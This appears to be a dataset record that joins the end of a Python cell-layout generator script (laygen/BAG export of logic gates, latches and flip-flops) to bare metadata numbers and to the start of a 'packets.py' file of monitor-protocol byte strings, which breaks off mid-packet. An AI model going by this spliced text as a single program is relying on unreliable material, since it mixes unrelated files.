                 devname_pmos_body='pmos4_fast_center_nf2',
                 m=_m, create_pin=True)
    laygen.add_template_from_cell()

# Transmission gates.
for _m in (2, 4, 8):
    _cell = 'tgate_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_tgate(laygen, objectname_pfix='TG0', placement_grid=pg,
                   routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                   routing_grid_m1m2_pin=rg_m1m2_pin,
                   routing_grid_m2m3_pin=rg_m2m3_pin,
                   devname_nmos_boundary='nmos4_fast_boundary',
                   devname_nmos_body='nmos4_fast_center_nf2',
                   devname_nmos_space='nmos4_fast_space',
                   devname_pmos_boundary='pmos4_fast_boundary',
                   devname_pmos_body='pmos4_fast_center_nf2',
                   devname_pmos_space='pmos4_fast_space',
                   m=_m, create_pin=True)
    laygen.add_template_from_cell()

# nmos switches.
for _m in (2, 4, 8, 12, 16):
    _cell = 'nsw_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_nsw(laygen, objectname_pfix='NSW0', placement_grid=pg,
                 routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                 routing_grid_m1m2_pin=rg_m1m2_pin,
                 routing_grid_m2m3_pin=rg_m2m3_pin,
                 devname_nmos_boundary='nmos4_fast_boundary',
                 devname_nmos_body='nmos4_fast_center_nf2',
                 devname_nmos_space='nmos4_fast_space',
                 devname_pmos_boundary='pmos4_fast_boundary',
                 devname_pmos_body='pmos4_fast_center_nf2',
                 devname_pmos_space='pmos4_fast_space',
                 m=_m, create_pin=True)
    laygen.add_template_from_cell()

# nsw_wovdd_2x is generated by the code that follows this section.
laygen.add_cell('nsw_wovdd_2x')
# --- nmos switches w/o VDD, logic gates, muxes, latches, dff_1x ------------
# nsw_wovdd_2x was added by the preceding code; only select it for m == 2.
for _m in (2, 4, 8, 12, 16):
    _cell = 'nsw_wovdd_%dx' % _m
    if _m != 2:
        laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_nsw_wovdd(laygen, objectname_pfix='NSW0', placement_grid=pg,
                       routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                       routing_grid_m1m2_pin=rg_m1m2_pin,
                       routing_grid_m2m3_pin=rg_m2m3_pin,
                       devname_nmos_boundary='nmos4_fast_boundary',
                       devname_nmos_body='nmos4_fast_center_nf2',
                       devname_nmos_space='nmos4_fast_space',
                       m=_m, create_pin=True)
    laygen.add_template_from_cell()

# nand_1x uses the 2-stack nmos and split single-finger pmos devices.
laygen.add_cell('nand_1x')
laygen.sel_cell('nand_1x')
generate_nand_1x(laygen, objectname_pfix='ND0', placement_grid=pg,
                 routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                 routing_grid_m1m2_pin=rg_m1m2_pin,
                 routing_grid_m2m3_pin=rg_m2m3_pin,
                 devname_nmos_boundary='nmos4_fast_boundary',
                 devname_nmos_body_2stack='nmos4_fast_center_2stack',
                 devname_pmos_boundary='pmos4_fast_boundary',
                 devname_pmos_body_left='pmos4_fast_center_nf1_left',
                 devname_pmos_body_right='pmos4_fast_center_nf1_right',
                 create_pin=True)
laygen.add_template_from_cell()

# NOR gates.
for _m in (2, 4, 8):
    _cell = 'nor_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_nor(laygen, objectname_pfix='NR0', placement_grid=pg,
                 routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                 routing_grid_m1m2_pin=rg_m1m2_pin,
                 routing_grid_m2m3_pin=rg_m2m3_pin,
                 devname_nmos_boundary='nmos4_fast_boundary',
                 devname_nmos_body='nmos4_fast_center_nf2',
                 devname_pmos_boundary='pmos4_fast_boundary',
                 devname_pmos_body='pmos4_fast_center_nf2',
                 m=_m, create_pin=True)
    laygen.add_template_from_cell()

# NAND gates.
for _m in (2, 4, 8, 16):
    _cell = 'nand_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_nand(laygen, objectname_pfix='ND0', placement_grid=pg,
                  routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                  routing_grid_m1m2_pin=rg_m1m2_pin,
                  routing_grid_m2m3_pin=rg_m2m3_pin,
                  devname_nmos_boundary='nmos4_fast_boundary',
                  devname_nmos_body='nmos4_fast_center_nf2',
                  devname_pmos_boundary='pmos4_fast_boundary',
                  devname_pmos_body='pmos4_fast_center_nf2',
                  m=_m, create_pin=True)
    laygen.add_template_from_cell()

# Matched NAND gates (pmos dummy devices included).
for _m in (2, 4, 8, 16):
    _cell = 'nand_match_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_nand_match(laygen, objectname_pfix='ND0', placement_grid=pg,
                        routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                        routing_grid_m1m2_pin=rg_m1m2_pin,
                        routing_grid_m2m3_pin=rg_m2m3_pin,
                        devname_nmos_boundary='nmos4_fast_boundary',
                        devname_nmos_body='nmos4_fast_center_nf2',
                        devname_pmos_boundary='pmos4_fast_boundary',
                        devname_pmos_body='pmos4_fast_center_nf2',
                        devname_pmos_dmy='pmos4_fast_dmy_nf2',
                        m=_m, create_pin=True)
    laygen.add_template_from_cell()

# Tristate inverters, minimum-size flavors (identical argument sets).
for _cell, _gen in (('tinv_1x', generate_tinv_1x),
                    ('tinv_small_1x', generate_tinv_small_1x)):
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    _gen(laygen, objectname_pfix='TINV0', placement_grid=pg,
         routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
         routing_grid_m1m2_pin=rg_m1m2_pin,
         routing_grid_m2m3_pin=rg_m2m3_pin,
         devname_nmos_boundary='nmos4_fast_boundary',
         devname_nmos_body_2stack='nmos4_fast_center_2stack',
         devname_nmos_space='nmos4_fast_space',
         devname_pmos_boundary='pmos4_fast_boundary',
         devname_pmos_body_2stack='pmos4_fast_center_2stack',
         devname_pmos_space='pmos4_fast_space',
         pin_i_abut='pmos', create_pin=True)
    laygen.add_template_from_cell()

# Larger tristate inverters.
for _m in (2, 4, 8):
    _cell = 'tinv_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_tinv(laygen, objectname_pfix='TINV0', placement_grid=pg,
                  routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                  routing_grid_m1m2_pin=rg_m1m2_pin,
                  routing_grid_m2m3_pin=rg_m2m3_pin,
                  devname_nmos_boundary='nmos4_fast_boundary',
                  devname_nmos_body='nmos4_fast_center_nf2',
                  devname_pmos_boundary='pmos4_fast_boundary',
                  devname_pmos_body='pmos4_fast_center_nf2',
                  m=_m, create_pin=True)
    laygen.add_template_from_cell()

# 2-to-1 mux, minimum size.
laygen.add_cell('mux2to1_1x')
laygen.sel_cell('mux2to1_1x')
generate_mux2to1_1x(laygen, objectname_pfix='MUX2TO10', placement_grid=pg,
                    routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                    routing_grid_m1m2_pin=rg_m1m2_pin,
                    routing_grid_m2m3_pin=rg_m2m3_pin,
                    devname_nmos_boundary='nmos4_fast_boundary',
                    devname_nmos_body_2stack='nmos4_fast_center_2stack',
                    devname_pmos_boundary='pmos4_fast_boundary',
                    devname_pmos_body_2stack='pmos4_fast_center_2stack',
                    create_pin=True)
laygen.add_template_from_cell()

# Larger 2-to-1 muxes.
# BUGFIX: the 4x and 8x variants previously passed objectname_pfix='TINV0'
# (copy-paste from the tinv section) while the 2x variant used 'MUX2TO10';
# all sizes now use the consistent 'MUX2TO10' internal object prefix.
for _m in (2, 4, 8):
    _cell = 'mux2to1_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    generate_mux2to1(laygen, objectname_pfix='MUX2TO10', placement_grid=pg,
                     routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                     routing_grid_m3m4=rg_m3m4,
                     routing_grid_m1m2_pin=rg_m1m2_pin,
                     routing_grid_m2m3_pin=rg_m2m3_pin,
                     devname_nmos_boundary='nmos4_fast_boundary',
                     devname_nmos_body='nmos4_fast_center_nf2',
                     devname_nmos_space='nmos4_fast_space',
                     devname_pmos_boundary='pmos4_fast_boundary',
                     devname_pmos_body='pmos4_fast_center_nf2',
                     devname_pmos_space='pmos4_fast_space',
                     m=_m, create_pin=True)
    laygen.add_template_from_cell()

# Latches: these generators instantiate templates from the working library,
# so temporarily switch the template library around each generate call.
for _m in (1, 2, 4, 8):
    _cell = 'latch_2ck_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    laygen.templates.sel_library(workinglib)
    generate_latch_2ck(laygen, objectname_pfix='LATCH0', placement_grid=pg,
                       routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                       routing_grid_m3m4=rg_m3m4,
                       origin=np.array([0, 0]), m=_m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()

for _m in (2, 4):
    _cell = 'latch_2ck_rstbh_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    laygen.templates.sel_library(workinglib)
    generate_latch_2ck_rstbh(laygen, objectname_pfix='LATCH0',
                             placement_grid=pg,
                             routing_grid_m1m2=rg_m1m2,
                             routing_grid_m2m3=rg_m2m3,
                             routing_grid_m3m4=rg_m3m4,
                             origin=np.array([0, 0]), m=_m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()

# dff_1x: generated here; its add_template_from_cell() call follows
# immediately after this section.
laygen.add_cell('dff_1x')
laygen.sel_cell('dff_1x')
laygen.templates.sel_library(workinglib)
generate_dff(laygen, objectname_pfix='DFF0', placement_grid=pg,
             routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
             routing_grid_m3m4=rg_m3m4,
             origin=np.array([0, 0]), m=1, create_pin=True)
laygen.templates.sel_library(utemplib)
# --- dff variants, oai22, ndsr, custom sized cells, export -----------------
# Finish registering dff_1x (generated just above), then build the larger
# multiplicities.  The dff/ndsr generators instantiate templates from the
# working library, so the template library is switched around each call.
laygen.add_template_from_cell()

for _m in (2, 4):
    _cell = 'dff_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    laygen.templates.sel_library(workinglib)
    generate_dff(laygen, objectname_pfix='DFF0', placement_grid=pg,
                 routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                 routing_grid_m3m4=rg_m3m4,
                 origin=np.array([0, 0]), m=_m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()

for _m in (1, 2, 4):
    _cell = 'dff_rsth_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    laygen.templates.sel_library(workinglib)
    generate_dff_rsth(laygen, objectname_pfix='DFF0', placement_grid=pg,
                      routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                      routing_grid_m3m4=rg_m3m4,
                      origin=np.array([0, 0]), m=_m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()

# OAI22 gates.
laygen.add_cell('oai22_1x')
laygen.sel_cell('oai22_1x')
generate_oai22_1x(laygen, objectname_pfix='OAI0', placement_grid=pg,
                  routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                  routing_grid_m1m2_pin=rg_m1m2_pin,
                  routing_grid_m2m3_pin=rg_m2m3_pin,
                  devname_nmos_boundary='nmos4_fast_boundary',
                  devname_nmos_body_left='nmos4_fast_center_nf1_left',
                  devname_nmos_body_right='nmos4_fast_center_nf1_right',
                  devname_pmos_boundary='pmos4_fast_boundary',
                  devname_pmos_body_2stack='pmos4_fast_center_2stack',
                  origin=np.array([0, 0]), create_pin=True)
laygen.add_template_from_cell()

laygen.add_cell('oai22_skewed_1x')
laygen.sel_cell('oai22_skewed_1x')
generate_oai22_skewed_1x(laygen, objectname_pfix='OAI0', placement_grid=pg,
                         routing_grid_m1m2=rg_m1m2,
                         routing_grid_m2m3=rg_m2m3,
                         routing_grid_m1m2_pin=rg_m1m2_pin,
                         routing_grid_m2m3_pin=rg_m2m3_pin,
                         devname_nmos_boundary='nmos4_fast_boundary',
                         devname_nmos_body_left='nmos4_fast_center_nf1_left',
                         devname_nmos_body_right='nmos4_fast_center_nf1_right',
                         devname_nmos_space='nmos4_fast_space',
                         devname_pmos_boundary='pmos4_fast_boundary',
                         devname_pmos_body_2stack='pmos4_fast_center_2stack',
                         origin=np.array([0, 0]), create_pin=True)
laygen.add_template_from_cell()

# NAND-based SR latches.
for _m in (1, 2):
    _cell = 'ndsr_%dx' % _m
    laygen.add_cell(_cell)
    laygen.sel_cell(_cell)
    laygen.templates.sel_library(workinglib)
    generate_ndsr(laygen, objectname_pfix='NDSR0', placement_grid=pg,
                  routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                  routing_grid_m3m4=rg_m3m4,
                  origin=np.array([0, 0]), m=_m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()

# Intermediate save so the templates above are on disk before the extra
# cells below are generated.
laygen.save_template(filename=workinglib + '.yaml', libname=workinglib)

# Cells to export (bag export if bag exists, otherwise gds export).
mycell_list = [
    'space_1x', 'space_2x', 'space_4x', 'space_wovdd_1x',
    'space_wovdd_2x', 'space_wovdd_4x',
    'tap', 'tap_wovdd', 'tap_float', 'tap_float_pmos_vss', 'tap_pmos_vss',
    'tie_2x', 'tie_wovdd_2x',
    'bcap_4x', 'bcap_8x',
    'dcap_2x', 'dcap_4x', 'dcap_8x', 'dcap2_4x', 'dcap2_8x', 'dcap3_8x',
    'bcap2_8x',
    'inv_1x', 'inv_2x', 'inv_4x', 'inv_6x', 'inv_8x', 'inv_10x',
    'inv_16x', 'inv_24x', 'inv_32x',
    'tgate_2x', 'tgate_4x', 'tgate_8x',
    'nsw_2x', 'nsw_4x', 'nsw_8x', 'nsw_12x', 'nsw_16x',
    'nsw_wovdd_2x', 'nsw_wovdd_4x', 'nsw_wovdd_8x', 'nsw_wovdd_12x',
    'nsw_wovdd_16x',
    'tinv_1x', 'tinv_small_1x', 'tinv_2x', 'tinv_4x', 'tinv_8x',
    'nand_1x', 'nand_2x', 'nand_4x', 'nand_8x', 'nand_16x',
    'nand_match_2x', 'nand_match_4x', 'nand_match_8x', 'nand_match_16x',
    'nor_2x', 'nor_4x', 'nor_8x',
    'latch_2ck_1x', 'latch_2ck_2x', 'latch_2ck_4x', 'latch_2ck_8x',
    'latch_2ck_rstbh_2x', 'latch_2ck_rstbh_4x',
    'dff_1x', 'dff_2x', 'dff_4x',
    'dff_rsth_1x', 'dff_rsth_2x', 'dff_rsth_4x',
    'oai22_1x', 'oai22_skewed_1x',
    'ndsr_1x', 'ndsr_2x',
    'mux2to1_1x', 'mux2to1_2x', 'mux2to1_4x', 'mux2to1_8x',
]

# Zhongkai's cells
tgate_dn_size = [2, 4, 8, 16, 18, 24]
pull_dn_size = 4
for m in tgate_dn_size:
    laygen.add_cell('tgate_dn_' + str(m) + 'x')
    laygen.sel_cell('tgate_dn_' + str(m) + 'x')
    generate_tgate_dn(laygen, objectname_pfix='TG0', placement_grid=pg,
                      routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                      routing_grid_m1m2_pin=rg_m1m2_pin,
                      routing_grid_m2m3_pin=rg_m2m3_pin,
                      devname_nmos_boundary='nmos4_fast_boundary',
                      devname_nmos_body='nmos4_fast_center_nf2',
                      devname_nmos_space='nmos4_fast_space',
                      devname_pmos_boundary='pmos4_fast_boundary',
                      devname_pmos_body='pmos4_fast_center_nf2',
                      devname_pmos_space='pmos4_fast_space',
                      m=m, n=pull_dn_size, create_pin=True)
    laygen.add_template_from_cell()
    mycell_list.append('tgate_dn_' + str(m) + 'x')

# cap_sw
cap_sw_size = [2, 4, 8, 16, 32]
for m in cap_sw_size:
    laygen.add_cell('cap_sw_' + str(m) + 'x')
    laygen.sel_cell('cap_sw_' + str(m) + 'x')
    generate_cap_sw(laygen, objectname_pfix='CSW0', placement_grid=pg,
                    routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                    routing_grid_m1m2_pin=rg_m1m2_pin,
                    routing_grid_m2m3_pin=rg_m2m3_pin,
                    devname_nmos_boundary='nmos4_fast_boundary',
                    devname_nmos_body='nmos4_fast_center_nf2',
                    devname_nmos_space='nmos4_fast_space',
                    devname_pmos_boundary='pmos4_fast_boundary',
                    devname_pmos_body='pmos4_fast_center_nf2',
                    devname_pmos_space='pmos4_fast_space',
                    m=m, create_pin=True)
    laygen.add_template_from_cell()
    mycell_list.append('cap_sw_' + str(m) + 'x')

inv_size = [6, 8, 36, 40, 50, 64, 100]
for m in inv_size:
    cellname = 'inv_' + str(m) + 'x'
    # BUGFIX: inv_6x and inv_8x are already generated earlier in this file
    # (and already appear in mycell_list); regenerating them here created
    # duplicate cells and exported them twice.  Skip duplicates.
    if cellname in mycell_list:
        continue
    laygen.add_cell(cellname)
    laygen.sel_cell(cellname)
    generate_inv(laygen, objectname_pfix='INV0', placement_grid=pg,
                 routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                 routing_grid_m1m2_pin=rg_m1m2_pin,
                 routing_grid_m2m3_pin=rg_m2m3_pin,
                 devname_nmos_boundary='nmos4_fast_boundary',
                 devname_nmos_body='nmos4_fast_center_nf2',
                 devname_pmos_boundary='pmos4_fast_boundary',
                 devname_pmos_body='pmos4_fast_center_nf2',
                 m=m, create_pin=True)
    laygen.add_template_from_cell()
    mycell_list.append(cellname)

# latch
latch_2ck_strstbh_size = [1, 2, 4, 8]
for m in latch_2ck_strstbh_size:
    laygen.add_cell('latch_2ck_strstbh_' + str(m) + 'x')
    laygen.sel_cell('latch_2ck_strstbh_' + str(m) + 'x')
    laygen.templates.sel_library(workinglib)
    generate_latch_2ck_strstbh(laygen, objectname_pfix='LATCH0',
                               placement_grid=pg,
                               routing_grid_m1m2=rg_m1m2,
                               routing_grid_m2m3=rg_m2m3,
                               routing_grid_m3m4=rg_m3m4,
                               origin=np.array([0, 0]), m=m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()
    mycell_list.append('latch_2ck_strstbh_' + str(m) + 'x')

# dff
dff_strsth_size = [1, 2, 4, 8]
for m in dff_strsth_size:
    laygen.add_cell('dff_strsth_' + str(m) + 'x')
    laygen.sel_cell('dff_strsth_' + str(m) + 'x')
    laygen.templates.sel_library(workinglib)
    generate_dff_strsth(laygen, objectname_pfix='DFF0', placement_grid=pg,
                        routing_grid_m1m2=rg_m1m2, routing_grid_m2m3=rg_m2m3,
                        routing_grid_m3m4=rg_m3m4,
                        origin=np.array([0, 0]), m=m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()
    mycell_list.append('dff_strsth_' + str(m) + 'x')

# dff_clkb
dff_strsth_clkb_size = [1, 2, 4, 8]
for m in dff_strsth_clkb_size:
    laygen.add_cell('dff_strsth_ckb_' + str(m) + 'x')
    laygen.sel_cell('dff_strsth_ckb_' + str(m) + 'x')
    laygen.templates.sel_library(workinglib)
    generate_dff_strsth_ckb(laygen, objectname_pfix='DFF0', placement_grid=pg,
                            routing_grid_m1m2=rg_m1m2,
                            routing_grid_m2m3=rg_m2m3,
                            routing_grid_m3m4=rg_m3m4,
                            origin=np.array([0, 0]), m=m, create_pin=True)
    laygen.templates.sel_library(utemplib)
    laygen.add_template_from_cell()
    mycell_list.append('dff_strsth_ckb_' + str(m) + 'x')
# end Zhongkai's cells

laygen.save_template(filename=workinglib + '.yaml', libname=workinglib)

# BAG export if a BAG installation is present; otherwise fall back to a
# plain GDS stream-out.  NOTE(review): `imp` is deprecated in Python 3;
# kept for compatibility with the rest of this codebase.
import imp
try:
    imp.find_module('bag')
    import bag
    prj = bag.BagProject()
    for mycell in mycell_list:
        laygen.sel_cell(mycell)
        laygen.export_BAG(prj, array_delimiter=['[', ']'])
except ImportError:
    laygen.export_GDS('output.gds', cellname=mycell_list,
                      layermapfile=tech + ".layermap")  # change layermapfile
71.825161
208
0.64874
52,433
367,673
4.345927
0.012053
0.066599
0.032861
0.027213
0.974112
0.966485
0.957704
0.951459
0.944047
0.935871
0
0.067221
0.191115
367,673
5,118
209
71.839195
0.698973
0.043677
0
0.770167
0
0
0.052658
0.00715
0
0
0
0
0
1
0.011456
false
0
0.002148
0
0.013604
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
2936067d2b4ccaf0ffe52fd08e0904f29ee4f348
210,420
py
Python
packets.py
hankersyan/mp20simulator
72e1a2b2652588ba7651892ee9230f43567f2d24
[ "Apache-2.0" ]
3
2019-11-15T03:41:16.000Z
2021-10-12T06:24:17.000Z
packets.py
hankersyan/mp20simulator
72e1a2b2652588ba7651892ee9230f43567f2d24
[ "Apache-2.0" ]
null
null
null
packets.py
hankersyan/mp20simulator
72e1a2b2652588ba7651892ee9230f43567f2d24
[ "Apache-2.0" ]
2
2019-11-15T03:41:20.000Z
2019-11-15T03:46:19.000Z
# data or wave association request association_request = \ b"\x0d\xff\x01\x28\x05\x08" \ b"\x13\x01\x00\x16\x01\x02\x80\x00\x14\x02\x00\x02\xc1\xff\x01\x16" \ b"\x31\x80\xa0\x80\x80\x01\x01\x00\x00\xa2\x80\xa0\x03\x00\x00\x01" \ b"\xa4\x80\x30\x80\x02\x01\x01\x06\x04\x52\x01\x00\x01\x30\x80\x06" \ b"\x02\x51\x01\x00\x00\x00\x00\x30\x80\x02\x01\x02\x06\x0c\x2a\x86" \ b"\x48\xce\x14\x02\x01\x00\x00\x00\x01\x01\x30\x80\x06\x0c\x2a\x86" \ b"\x48\xce\x14\x02\x01\x00\x00\x00\x02\x01\x00\x00\x00\x00\x00\x00" \ b"\x61\x80\x30\x80\x02\x01\x01\xa0\x80\x60\x80\xa1\x80\x06\x0c\x2a" \ b"\x86\x48\xce\x14\x02\x01\x00\x00\x00\x03\x01\x00\x00\xbe\x80\x28" \ b"\x80\x06\x0c\x2a\x86\x48\xce\x14\x02\x01\x00\x00\x00\x01\x01\x02" \ b"\x01\x02\x81\x82\x00\x80\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00" \ b"\x00\x00\x80\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x02" \ b"\x00\x64\x00\x01\x00\x28\x80\x00\x00\x00\x00\x00\x0f\xa0\x00\x00" \ b"\x05\xb0\x00\x00\x05\xb0\xff\xff\xff\xff\x60\x00\x00\x00\x00\x01" \ b"\x00\x0c\xf0\x01\x00\x08\x8e\x00\x00\x00\x00\x00\x00\x00\x01\x02" \ b"\x00\x34\x00\x06\x00\x30\x00\x01\x00\x21\x00\x00\x00\x01\x00\x01" \ b"\x00\x06\x00\x00\x00\xc9\x00\x01\x00\x09\x00\x00\x00\x3c\x00\x01" \ b"\x00\x05\x00\x00\x00\x10\x00\x01\x00\x2a\x00\x00\x00\x01\x00\x01" \ b"\x00\x36\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00" print(type(association_request)) association_request_ba = bytearray(association_request) association_response = \ b"\x0e\xce\x05\x08\x13\x01" \ b"\x00\x16\x01\x02\x80\x00\x14\x02\x00\x02\xc1\xbe\x31\x80\xa0\x80" \ b"\x80\x01\x01\x00\x00\xa2\x80\xa0\x03\x00\x00\x01\xa5\x80\x30\x80" \ b"\x80\x01\x00\x81\x02\x51\x01\x00\x00\x30\x80\x80\x01\x00\x81\x0c" \ b"\x2a\x86\x48\xce\x14\x02\x01\x00\x00\x00\x02\x01\x00\x00\x00\x00" \ b"\x61\x80\x30\x80\x02\x01\x01\xa0\x80\x61\x80\xa1\x80\x06\x0c\x2a" \ b"\x86\x48\xce\x14\x02\x01\x00\x00\x00\x03\x01\x00\x00\xa2\x03\x02" \ 
b"\x01\x00\xa3\x05\xa1\x03\x02\x01\x00\xbe\x80\x28\x80\x02\x01\x02" \ b"\x81\x48\x80\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x80" \ b"\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x2c\x00\x01" \ b"\x00\x28\x80\x00\x00\x00\x00\x00\x0f\xa0\x00\x00\x05\xb0\x00\x00" \ b"\x05\xb0\xff\xff\xff\xff\x60\x00\x00\x00\x00\x01\x00\x0c\xf0\x01" \ b"\x00\x08\x8e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" mds_create_event_report = \ b"\xe1\x00\x00\x02\x00\x01" \ b"\x01\x1a\x00\x01\x00\x01\x01\x14\x00\x21\x00\x00\x00\x00\x0e\x7f" \ b"\x92\x00\x0d\x06\x01\x06\x00\x21\x00\x00\x00\x00\x00\x11\x00\xfc" \ b"\x09\x84\x00\x08\x00\x06\x00\x09\xfb\x9c\xa9\x3c\x09\x86\x00\x04" \ b"\x00\x01\x11\x4d\x09\x1d\x00\x02\x00\x4d\x09\x28\x00\x12\x00\x08" \ b"\x50\x68\x69\x6c\x69\x70\x73\x00\x00\x06\x4d\x38\x30\x30\x30\x00" \ b"\x09\x48\x00\x04\x00\x01\x00\x00\x09\x37\x00\x08\x06\x55\x06\x55" \ b"\x00\x0d\x00\x0b\x09\x46\x00\x02\x20\x00\x09\x0d\x00\x02\x00\x02" \ b"\x09\x35\x00\x02\x00\x01\x09\x82\x00\x02\x00\x00\x09\x0c\x00\x02" \ b"\x00\x00\xf1\xfa\x00\x14\x00\x01\x00\x10\x00\x01\x00\x0c\x00\x06" \ b"\x00\x00\x87\x92\x00\x06\x00\x00\x88\x16\x09\xa7\x00\x02\x00\x06" \ b"\x09\x1e\x00\x24\x00\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\x09\x87\x00\x08\x20\x19\x03\x21" \ b"\x17\x42\x28\x00\x09\x8f\x00\x04\x0e\x7f\x92\x00\x09\x85\x00\x3c" \ b"\x00\x01\x00\x38\x01\x02\x00\x34\x00\x06\x00\x30\x00\x01\x00\x21" \ b"\x00\x00\x00\x01\x00\x01\x00\x06\x00\x00\x01\x19\x00\x01\x00\x09" \ b"\x00\x00\x00\x4c\x00\x01\x00\x2a\x00\x00\x00\x01\x00\x01\x00\x36" \ b"\x00\x00\x00\x01\x00\x01\x00\x05\x00\x00\x00\x3d" mds_create_event_result = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x14\x00\x01\x00\x01\x00\x0e\x00\x21\x00\x00\x00\x00\x00\x0a" \ b"\xbd\x00\x0d\x06\x00\x00" rtsa_priority_list_request = \ b"\xe1\x00\x00\x02\x00\x01" \ 
b"\x00\x16\x00\x00\x00\x03\x00\x10\x00\x21\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x01\x00\x02\xf2\x3a" set_rtsa_priority_list_request = \ b"\xe1\x00\x00\x02\x00\x01" \ b"\x00\x2e\x00\x00\x00\x05\x00\x28\x00\x21\x00\x00\x00\x00\x00\x00" \ b"\x00\x00\x00\x01\x00\x1a\x00\x00\xf2\x3a\x00\x14\x00\x04\x00\x10" \ b"\x00\x02\x01\x02\x00\x02\x01\x01\x00\x02\x01\x3d\x00\x02\x4b\xb4" data_poll_request = \ b"\xe1\x00\x00\x02\x00\x01\x00\x20\x00\x01\x00\x07\x00\x1a\x00\x21" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x3b\x00\x0c\x00\x01\x00\x01" \ b"\x00\x06\x00\x00\x00\x00\x00\x00" ext_poll_wave_request = \ b"\xe1\x00\x00\x02\x00\x01\x00\x28\x00\x04\x00\x07\x00\x22\x00\x21" \ b"\x00\x00\x00\x00\x00\x00\x00\x00\xf1\x3b\x00\x14\x00\x03\x00\x01" \ b"\x00\x09\x00\x00\x00\x01\x00\x08\xf1\x3e\x00\x04\x00\x49\x3e\x00" rsp_get_result = \ b"\xe1\x00\x00\x02\x00\x02\x00\x18\x00\x00\x00\x03\x00\x12\x00\x21" \ b"\x00\x00\x00\x00\x00\x01\x00\x08\xf2\x3a\x00\x04\x00\x00\x00\x00" rsp_confirmed_set_result = \ b"\xe1\x00\x00\x02\x00\x02\x00\x28\x00\x00\x00\x05\x00\x22\x00\x21" \ b"\x00\x00\x00\x00\x00\x01\x00\x18\xf2\x3a\x00\x14\x00\x04\x00\x10" \ b"\x00\x02\x01\x02\x00\x02\x01\x01\x00\x02\x01\x3d\x00\x02\x4b\xb4" # first group of responses rsp_nu_1_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x7f\xaf\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ 